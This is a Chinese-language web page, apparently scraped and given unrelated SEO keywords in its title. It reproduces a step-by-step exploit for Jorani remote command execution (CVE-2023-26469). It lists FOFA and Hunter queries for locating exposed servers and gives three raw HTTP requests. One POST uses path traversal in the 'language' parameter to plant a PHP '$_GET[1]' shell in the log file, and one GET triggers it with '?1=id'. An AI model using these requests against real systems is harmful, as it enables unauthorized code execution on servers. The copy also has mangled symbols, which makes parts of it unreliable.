当前位置：首页 > news >正文

甘肃两学一做网站可以制作h5的网站

news 2025/11/15 3:47:52

甘肃两学一做网站,可以制作h5的网站,网站负责人法人,郑州优化公司有哪些Jorani远程命令执行漏洞 CVE-2023-26469 漏洞描述漏洞影响漏洞危害网络测绘Fofa: titleJoraniHunter: web.titleJorani 漏洞复现1. 获取cookie2. 构造poc3. 执行命令漏洞描述 Jorani是一款开源的员工考勤和休假管理系统#xff0c;适用于中小型企业… Jorani远程命令执行漏洞 CVE-2023-26469 漏洞描述漏洞影响漏洞危害网络测绘Fofa: titleJoraniHunter: web.titleJorani 漏洞复现1. 获取cookie2. 构造poc3. 执行命令漏洞描述 Jorani是一款开源的员工考勤和休假管理系统适用于中小型企业和全球化组织它简化了员工工时记录、休假请求和审批流程并提供了多语言支持以满足不同地区的需求。漏洞影响 Jorani 1.0.2 漏洞危害攻击者可以利用路径遍历来访问文件并在服务器上执行代码。网络测绘 Fofa: title“Jorani” Hunter: web.title“Jorani” 漏洞复现 1. 获取cookie GET /session/login HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?12. 构造poc POST /session/login HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ? Cookie: csrf_cookie_jorania3ab3adxxxxxxxxxx4606ecdd;jorani_sessionsmgd1ebvn2pxxxxxxxxxxxtbubagonjg Content-Type: application/x-www-form-urlencoded Content-Length: 160csrf_test_jorania3ab3adxxxxxxxxxx4606ecddlast_pagesession%2Floginlanguage..%2F..%2Fapplication%2Flogslogin%3f%3d$_GET[1]%3fCipheredValuetest3. 执行命令 GET /pages/view/log-2023-11-02?1id HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ? X-REQUESTED-WITH: XMLHttpRequest Cookie: csrf_cookie_jorania3ab3ada05xxxxxxxxxxx4606ecdd;jorani_sessionvtj9ig0s557xxxxxxxxxxskr16

查看全文

http://www.zqtcl.cn/news/636017/